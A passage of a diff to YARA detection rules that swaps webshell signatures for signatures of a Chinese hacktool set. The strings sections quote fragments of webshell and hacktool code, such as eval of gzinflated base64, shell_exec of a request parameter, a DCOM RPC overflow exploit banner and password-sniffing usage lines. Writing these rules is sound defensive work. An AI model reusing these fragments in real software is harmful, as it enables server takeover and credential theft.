+		uint16( 0 ) == 0x5a4d and filesize < 800KB and all of them
 }
-rule SIGNATURE_BASE_Darksecurityteam_Webshell
+rule SIGNATURE_BASE_CN_Tools_Myupnp : FILE
 {
 	meta:
-		description = "Dark Security Team Webshell"
+		description = "Chinese Hacktool Set - file MyUPnP.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "78dcd62f-9215-5571-a5ef-5f811ce9672f"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5542-L5554"
+		id = "394e19d3-882e-5a7c-a3a0-e662bd67955c"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L933-L948"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "f1c95b13a71ca3629a0bb79601fcacf57cdfcf768806a71b26f2448f8c1d5d24"
-		logic_hash = "0c58ed8845cb04d785322b280647d424e1028a3be7e92b2493fd907fae36b16d"
-		score = 50
+		hash = "15b6fca7e42cd2800ba82c739552e7ffee967000"
+		logic_hash = "0bdd0d98dc5218bbe799e5e510c5f27d74a1ef398b09962f4267f846088f726e"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "form method=post><input type=hidden name=\"\"#\"\" value=Execute(Session(\"\"#\"\"))><input name=thePath value=\"\"\"&HtmlEncode(Server.MapPath(\".\"))&" ascii
+		$s1 = "<description>BYTELINKER.COM</description>" fullword ascii
+		$s2 = "myupnp.exe" fullword ascii
+		$s3 = "LOADER ERROR" fullword ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 1500KB and all of them
 }
-rule SIGNATURE_BASE_PHP_Cloaked_Webshell_Superfetchexec
+rule SIGNATURE_BASE_CN_Tools_Shiell : FILE
 {
 	meta:
-		description = "Looks like a webshell cloaked as GIF - http://goo.gl/xFvioC"
+		description = "Chinese Hacktool Set - file Shiell.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4611129a-9865-5603-b1ec-7db0058a80d7"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "http://goo.gl/xFvioC"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5556-L5568"
+		id = "7ac7d79d-3f4e-54e7-bb97-ce94cbbb40a2"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L950-L966"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "320b85b1ad39a90578f53c69838b6264af1e6a71c509aefc0986c7f0c77fdae9"
-		score = 50
+		hash = "b432d80c37abe354d344b949c8730929d8f9817a"
+		logic_hash = "44c494c24c090b21c3c201d57f910e8f4d5132a863715a090fa1e18c9d349d48"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d);"
+		$s1 = "C:\\Users\\Tong\\Documents\\Visual Studio 2012\\Projects\\Shift shell" ascii
+		$s2 = "C:\\Windows\\System32\\Shiell.exe" fullword wide
+		$s3 = "Shift shell.exe" fullword wide
+		$s4 = "\" /v debugger /t REG_SZ /d \"" fullword wide
 
 	condition:
-		$s0
+		uint16( 0 ) == 0x5a4d and filesize < 1500KB and 2 of them
 }
-rule SIGNATURE_BASE_Webshell_Remexp_Asp_Php
+rule SIGNATURE_BASE_Cndcom_Cndcom : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file RemExp.asp.php.txt"
+		description = "Chinese Hacktool Set - file cndcom.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "274c8816-2711-5f12-937e-549ec2d57ce1"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5572-L5587"
+		id = "b1acfe34-03b8-5909-a226-3325fe8629ab"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L968-L988"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d9919dcf94a70d5180650de8b81669fa1c10c5a2"
-		logic_hash = "b3cfa44898629ffa20630436ae10a94ad72f0e793d61e1157a4de649aa048fe2"
+		hash = "08bbe6312342b28b43201125bd8c518531de8082"
+		logic_hash = "226be7ea7b09b2b87eeec006c8054b9fb59eb8324def14a4a0db97f94fb39d62"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "lsExt = Right(FileName, Len(FileName) - liCount)" fullword
-		$s7 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=File.Name%>\"> <a href= \"showcode.asp?f"
-		$s13 = "Response.Write Drive.ShareName & \" [share]\"" fullword
-		$s19 = "If Request.QueryString(\"CopyFile\") <> \"\" Then" fullword
-		$s20 = "<td width=\"40%\" height=\"20\" bgcolor=\"silver\">  Name</td>" fullword
+		$s1 = "- Rewritten by HDM last <hdm [at] metasploit.com>" fullword ascii
+		$s2 = "- Usage: %s <Target ID> <Target IP>" fullword ascii
+		$s3 = "- Remote DCOM RPC Buffer Overflow Exploit" fullword ascii
+		$s4 = "- Warning:This Code is more like a dos tool!(Modify by pingker)" fullword ascii
+		$s5 = "Windows NT SP6 (Chinese)" fullword ascii
+		$s6 = "- Original code by FlashSky and Benjurry" fullword ascii
+		$s7 = "\\C$\\123456111111111111111.doc" wide
+		$s8 = "shell3all.c" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and 2 of them
 }
-rule SIGNATURE_BASE_Webshell_Dc3_Security_Crew_Shell_Priv
+rule SIGNATURE_BASE_Isdebug_V1_4 : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file dC3_Security_Crew_Shell_PRiV.php"
+		description = "Chinese Hacktool Set - file IsDebug V1.4.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c83bb4ba-6b4e-5a88-925b-b93d08b304e4"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5588-L5604"
+		id = "f9b4a909-e0e5-5708-8794-39250b9d56cc"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L990-L1010"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "1b2a4a7174ca170b4e3a8cdf4814c92695134c8a"
-		logic_hash = "f93a5d87d4a490844de578067dc0b7bac6b01ceb9130cd7c70a227566e18f16c"
+		hash = "ca32474c358b4402421ece1cb31714fbb088b69a"
+		logic_hash = "d656327c33533b5ef7dc70ec00250ee35d878794fae189829a0ecad958f96616"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "@rmdir($_GET['file']) or die (\"[-]Error deleting dir!\");" fullword
-		$s4 = "$ps=str_replace(\"\\\\\",\"/\",getenv('DOCUMENT_ROOT'));" fullword
-		$s5 = "header(\"Expires: \".date(\"r\",mktime(0,0,0,1,1,2030)));" fullword
-		$s15 = "search_file($_POST['search'],urldecode($_POST['dir']));" fullword
-		$s16 = "echo base64_decode($images[$_GET['pic']]);" fullword
-		$s20 = "if (isset($_GET['rename_all'])) {" fullword
+		$s0 = "IsDebug.dll" fullword ascii
+		$s1 = "SV Dumper V1.0" fullword wide
+		$s2 = "(IsDebuggerPresent byte Patcher)" fullword ascii
+		$s8 = "Error WriteMemory failed" fullword ascii
+		$s9 = "IsDebugPresent" fullword ascii
+		$s10 = "idb_Autoload" fullword ascii
+		$s11 = "Bin Files" fullword ascii
+		$s12 = "MASM32 version" fullword ascii
 
 	condition:
-		3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 30KB and all of them
 }
-rule SIGNATURE_BASE_Webshell_Simattacker
+rule SIGNATURE_BASE_HTTPSCANNER : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file simattacker.php"
+		description = "Chinese Hacktool Set - file HTTPSCANNER.EXE"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2408fad8-780f-50de-a309-99d14a1d87b6"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5605-L5623"
+		id = "470c90f5-bb98-59ab-bff4-f6238c318e36"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1012-L1026"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "258297b62aeaf4650ce04642ad5f19be25ec29c9"
-		logic_hash = "323b68f1d31df647775ad16a85b9f90bce4eac89188160a1e4853f8fec680160"
+		hash = "ae2929346944c1ea3411a4562e9d5e2f765d088a"
+		logic_hash = "0f1460101198d8b139b7cc0674bef2fc7b3d2a24249f521396b7bbe4318a83d5"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "$from = rand (71,1020000000).\"@\".\"Attacker.com\";" fullword
-		$s4 = "&nbsp;Turkish Hackers : WWW.ALTURKS.COM <br>" fullword
-		$s5 = "&nbsp;Programer : SimAttacker - Edited By KingDefacer<br>" fullword
-		$s6 = "//fake mail = Use victim server 4 DOS - fake mail " fullword
-		$s10 = "&nbsp;e-mail : kingdefacer@msn.com<br>" fullword
-		$s17 = "error_reporting(E_ERROR | E_WARNING | E_PARSE);" fullword
-		$s18 = "echo \"<font size='1' color='#999999'>Dont in windows\";" fullword
-		$s20 = "$Comments=$_POST['Comments'];" fullword
+		$s1 = "HttpScanner.exe" fullword wide
+		$s2 = "HttpScanner" fullword wide
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 3500KB and all of them
 }
-rule SIGNATURE_BASE_Webshell_Dtool_Pro
+rule SIGNATURE_BASE_Hscan_V1_20_Pipecmd : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file DTool Pro.php"
+		description = "Chinese Hacktool Set - file PipeCmd.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9f2922d1-b2af-58ae-b194-ecb33577effa"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5624-L5642"
+		id = "957a8e3b-5f6c-5f3e-8973-88259c9cb0dc"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1028-L1049"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "e2ee1c7ba7b05994f65710b7bbf935954f2c3353"
-		logic_hash = "da744efb521415fb8817c0982d8d538e1e38b1c0995f43716611df37bf371c38"
+		hash = "64403ce63b28b544646a30da3be2f395788542d6"
+		logic_hash = "91ed275896c2520893ba1af26b2563c0bd3564a9c5f9d812f35464469e27307b"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "function PHPget(){inclVar(); if(confirm(\"O PHPget agora oferece uma lista pront"
-		$s2 = "<font size=3>by r3v3ng4ns - revengans@gmail.com </font>" fullword
-		$s3 = "function PHPwriter(){inclVar();var url=prompt(\"[ PHPwriter ] by r3v3ng4ns\\nDig"
-		$s11 = "//Turns the 'ls' command more usefull, showing it as it looks in the shell" fullword
-		$s13 = "if (@file_exists(\"/usr/bin/wget\")) $pro3=\"<i>wget</i> at /usr/bin/wget, \";" fullword
-		$s14 = "//To keep the changes in the url, when using the 'GET' way to send php variables" fullword
-		$s16 = "function PHPf(){inclVar();var o=prompt(\"[ PHPfilEditor ] by r3v3ng4ns\\nDigite "
-		$s18 = "if(empty($fu)) $fu = @$_GET['fu'];" fullword
+		$s1 = "%SystemRoot%\\system32\\PipeCmdSrv.exe" fullword ascii
+		$s2 = "PipeCmd.exe" fullword wide
+		$s3 = "Please Use NTCmd.exe Run This Program." fullword ascii
+		$s4 = "%s\\pipe\\%s%s%d" fullword ascii
+		$s5 = "\\\\.\\pipe\\%s%s%d" fullword ascii
+		$s6 = "%s\\ADMIN$\\System32\\%s%s" fullword ascii
+		$s7 = "This is a service executable! Couldn't start directly." fullword ascii
+		$s8 = "Connecting to Remote Server ...Failed" fullword ascii
+		$s9 = "PIPECMDSRV" fullword wide
 
 	condition:
-		3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and 4 of them
 }
-rule SIGNATURE_BASE_Webshell_Ironshell_4
+rule SIGNATURE_BASE_Dos_Fp : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file ironshell.php"
+		description = "Chinese Hacktool Set - file fp.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "06e87e02-372b-5d4e-be52-5515a068665b"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		old_rule_name = "WebShell_ironshell"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5643-L5662"
+		id = "f4427aab-50c3-5bb9-997a-75e162a83f8a"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1051-L1067"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d47b8ba98ea8061404defc6b3a30839c4444a262"
-		logic_hash = "1810071f261ad7390532b07ef24115726f236131aa8ffd29adbde9ebe5085e9d"
+		hash = "41d57d356098ff55fe0e1f0bcaa9317df5a2a45c"
+		logic_hash = "cc09743269ee36862c95c9323ad271ca9b6c350cf25163d126fef0f86bc6f671"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<title>'.getenv(\"HTTP_HOST\").' ~ Shell I</title>" fullword
-		$s2 = "$link = mysql_connect($_POST['host'], $_POST['username'], $_POST"
-		$s4 = "error_reporting(0); //If there is an error, we'll show it, k?" fullword
-		$s8 = "print \"<form action=\\\"\".$me.\"?p=chmod&file=\".$content.\"&d"
-		$s15 = "if(!is_numeric($_POST['timelimit']))" fullword
-		$s16 = "if($_POST['chars'] == \"9999\")" fullword
-		$s17 = "<option value=\\\"az\\\">a - zzzzz</option>" fullword
-		$s18 = "print shell_exec($command);" fullword
+		$s1 = "fpipe -l 53 -s 53 -r 80 192.168.1.101" fullword ascii
+		$s2 = "FPipe.exe" fullword wide
+		$s3 = "http://www.foundstone.com" fullword ascii
+		$s4 = "%s %s port %d. Address is already in use" fullword ascii
 
 	condition:
-		3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 65KB and all of them
 }
-rule SIGNATURE_BASE_Webshell_Indexer_Asp_Php
+rule SIGNATURE_BASE_Dos_Netstat : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file indexer.asp.php.txt"
+		description = "Chinese Hacktool Set - file netstat.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d6e17429-1b58-5a1b-846d-f5dbfd74cf3a"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5663-L5679"
+		id = "bc3141bf-4e82-5aa4-a8a6-a0a4586ee9a1"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1069-L1085"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "e9a7aa5eb1fb228117dc85298c7d3ecd8e288a2d"
-		logic_hash = "c576925c95b5bd2549e8039a1fc6ac228bfab5ddee8c4e12264ea78e9828ba5c"
+		hash = "d0444b7bd936b5fc490b865a604e97c22d97e598"
+		logic_hash = "e2b908308616c3f2c94849b4f22f0e9bb130b5759d89161604505ff25681be55"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<meta http-equiv=\"Content-Language\" content=\"tr\">" fullword
-		$s1 = "<title>WwW.SaNaLTeRoR.OrG - inDEXER And ReaDer</title>" fullword
-		$s2 = "<form action=\"?Gonder\" method=\"post\">" fullword
-		$s4 = "<form action=\"?oku\" method=\"post\">" fullword
-		$s7 = "var message=\"SaNaLTeRoR - " fullword
-		$s8 = "nDexEr - Reader\"" fullword
+		$s0 = "w03a2409.dll" fullword ascii
+		$s1 = "Retransmission Timeout Algorithm    = unknown (%1!u!)" fullword wide
+		$s2 = "Administrative Status  = %1!u!" fullword wide
+		$s3 = "Packet Too Big            %1!-10u!  %2!-10u!" fullword wide
 
 	condition:
-		3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 150KB and all of them
 }
-rule SIGNATURE_BASE_Webshell_Toolaspshell
+rule SIGNATURE_BASE_CN_Tools_Xsniff : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file toolaspshell.php"
+		description = "Chinese Hacktool Set - file xsniff.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "016af030-4991-583c-aab5-a2933ae0eeec"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5680-L5693"
+		id = "a0fdac88-a7b8-5d24-9012-2bfe7b07e675"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1087-L1104"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "11d236b0d1c2da30828ffd2f393dd4c6a1022e3f"
-		logic_hash = "cb46d3170a9c144a22ef8c91b381495a471d2aa178a4a123eb9a1e32e1db7683"
+		hash = "d61d7329ac74f66245a92c4505a327c85875c577"
+		logic_hash = "a32d07ecd635ad71edaa37d9b1e5f66d8ce5a7f84f1bba6eb06deb1f49a879c8"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "cprthtml = \"<font face='arial' size='1'>RHTOOLS 1.5 BETA(PVT) Edited By KingDef"
-		$s12 = "barrapos = CInt(InstrRev(Left(raiz,Len(raiz) - 1),\"\\\")) - 1" fullword
-		$s20 = "destino3 = folderItem.path & \"\\index.asp\"" fullword
+		$s0 = "xsiff.exe -pass -hide -log pass.log" fullword ascii
+		$s1 = "HOST: %s USER: %s, PASS: %s" fullword ascii
+		$s2 = "xsiff.exe -tcp -udp -asc -addr 192.168.1.1" fullword ascii
+		$s10 = "Code by glacier <glacier@xfocus.org>" fullword ascii
+		$s11 = "%-5s%s->%s Bytes=%d TTL=%d Type: %d,%d ID=%d SEQ=%d" fullword ascii
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 220KB and 2 of them
 }
-rule SIGNATURE_BASE_Webshell_B374K_Mini_Shell_Php_Php
+rule SIGNATURE_BASE_Mssqlpass : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file b374k-mini-shell-php.php.php"
+		description = "Chinese Hacktool Set - file MSSqlPass.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d5b0dfa5-46b5-5323-a8e8-b119d8c2c8e5"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5694-L5707"
+		id = "d45b417f-3649-5603-bd19-8b8bcc19dabc"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1106-L1121"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "afb88635fbdd9ebe86b650cc220d3012a8c35143"
-		logic_hash = "553bd775d9662f9410d9ab946ccffe4b2ee92e367bcc6345fa595527653280cf"
+		hash = "172b4e31ed15d1275ac07f3acbf499daf9a055d7"
+		logic_hash = "8037316eb157f8693bd342911af5fe5292f3ef8a3c169c80bc70edbabd7a92e6"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "@error_reporting(0);" fullword
-		$s2 = "@eval(gzinflate(base64_decode($code)));" fullword
-		$s3 = "@set_time_limit(0); " fullword
+		$s0 = "Reveals the passwords stored in the Registry by Enterprise Manager of SQL Server" wide
+		$s1 = "empv.exe" fullword wide
+		$s2 = "Enterprise Manager PassView" fullword wide
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 120KB and all of them
 }
-rule SIGNATURE_BASE_Webshell_Sincap_1_0
+rule SIGNATURE_BASE_Wsockexpert : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file Sincap 1.0.php"
+		description = "Chinese Hacktool Set - file WSockExpert.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "38d39739-660f-596d-a297-1f0dfe530797"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5708-L5723"
+		id = "0ae115be-c516-5f4a-97ce-555d84f42947"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1123-L1141"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "9b72635ff1410fa40c4e15513ae3a496d54f971c"
-		logic_hash = "0cb8851285bd55b0b613ec4c46ab88142e2cbba7e527ad510b008cfb342af221"
+		hash = "2962bf7b0883ceda5e14b8dad86742f95b50f7bf"
+		logic_hash = "34ac3c5f0651ccab851d67da8863e0e305f981cf53a06d46c23f19736cc1c400"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s4 = "</font></span><a href=\"mailto:shopen@aventgrup.net\">" fullword
-		$s5 = "<title>:: AventGrup ::.. - Sincap 1.0 | Session(Oturum) B" fullword
-		$s9 = "</span>Avrasya Veri ve NetWork Teknolojileri Geli" fullword
-		$s12 = "while (($ekinci=readdir ($sedat))){" fullword
-		$s19 = "$deger2= \"$ich[$tampon4]\";" fullword
+		$s1 = "OpenProcessCmdExecute!" fullword ascii
+		$s2 = "http://www.hackp.com" fullword ascii
+		$s3 = "'%s' is not a valid time!'%s' is not a valid date and time" fullword wide
+		$s4 = "SaveSelectedFilterCmdExecute" fullword ascii
+		$s5 = "PasswordChar@" fullword ascii
+		$s6 = "WSockHook.DLL" fullword ascii
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 2500KB and 4 of them
 }
-rule SIGNATURE_BASE_Webshell_B374K_Php
+rule SIGNATURE_BASE_Ms_Viru_Racle : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file b374k.php.php"
+		description = "Chinese Hacktool Set - file racle.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "73eb7d8d-14bb-5bc2-90b2-90b6bd603bd1"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5724-L5739"
+		id = "bdc78dcc-79e6-5516-bba2-54bf537eae38"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1143-L1159"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "04c99efd187cf29dc4e5603c51be44170987bce2"
-		logic_hash = "f44ecdcf327cf417a90a91c8d23f6137b80c2006bea2ca2e214f2bfdf5793771"
+		hash = "13116078fff5c87b56179c5438f008caf6c98ecb"
+		logic_hash = "d36db04c6a62a72e9f3079d09aedc9056c0a5032b4594af4d02ba55373f8b6a4"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "// encrypt your password to md5 here http://kerinci.net/?x=decode" fullword
-		$s6 = "// password (default is: b374k)"
-		$s8 = "//******************************************************************************"
-		$s9 = "// b374k 2.2" fullword
-		$s10 = "eval(\"?>\".gzinflate(base64_decode("
+		$s0 = "PsInitialSystemProcess @%p" fullword ascii
+		$s1 = "PsLookupProcessByProcessId(%u) Failed" fullword ascii
+		$s2 = "PsLookupProcessByProcessId(%u) => %p" fullword ascii
+		$s3 = "FirstStage() Loaded, CurrentThread @%p Stack %p - %p" fullword ascii
 
 	condition:
-		3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 210KB and all of them
 }
-rule SIGNATURE_BASE_Webshell_Simattacker___Vrsion_1_0_0___Priv8_4_My_Friend
+rule SIGNATURE_BASE_Lamescan3 : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php"
+		description = "Chinese Hacktool Set - file lamescan3.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3e0bae7d-77a1-5439-bbe7-177bec23cea0"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5740-L5757"
+		id = "8ff1a0e6-d054-589d-a038-f889951ba250"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1161-L1177"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "6454cc5ab73143d72cf0025a81bd1fe710351b44"
-		logic_hash = "63ebb0c673a5aee05d2d9d571ebf63942d826b5148a5f7ed587ba1efbb0dc923"
